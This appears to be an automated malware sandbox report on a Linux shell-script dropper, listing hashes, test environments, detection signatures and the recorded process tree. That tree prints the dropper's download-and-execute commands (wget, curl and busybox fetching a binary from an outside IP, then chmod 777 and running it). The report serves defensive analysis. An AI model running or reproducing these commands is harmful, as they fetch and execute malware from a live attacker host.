Analysis
-
max time kernel
27s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
28/10/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
-
Size
10KB
-
MD5
688ca450547096f076169e59bab218e1
-
SHA1
2187af4719b3b2f94b20e5e3ad20b8222bc077ac
-
SHA256
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127
-
SHA512
4b9aa7e6693587d69eb70d43f25242123a62a6acd4b0c3bedd1533f2afb49f99d44f26bb6c17dbcf9ca11f2d689e80cccb1df2447fa39a4541d82c23b2c13b0c
-
SSDEEP
192:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9Oure6/8cbOOD6O9:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9OurZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh (PID:1484)
- /bin/rm: /bin/rm bins.sh (PID:1485)
- /usr/bin/wget: wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1486)
- /usr/bin/curl: curl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1491) - Writes file to tmp directory
- /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1492)
- /bin/chmod: chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1493) - File and Directory Permissions Modification
- /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH: ./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1494) - Executes dropped EXE
- /bin/rm: rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH (PID:1495)
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97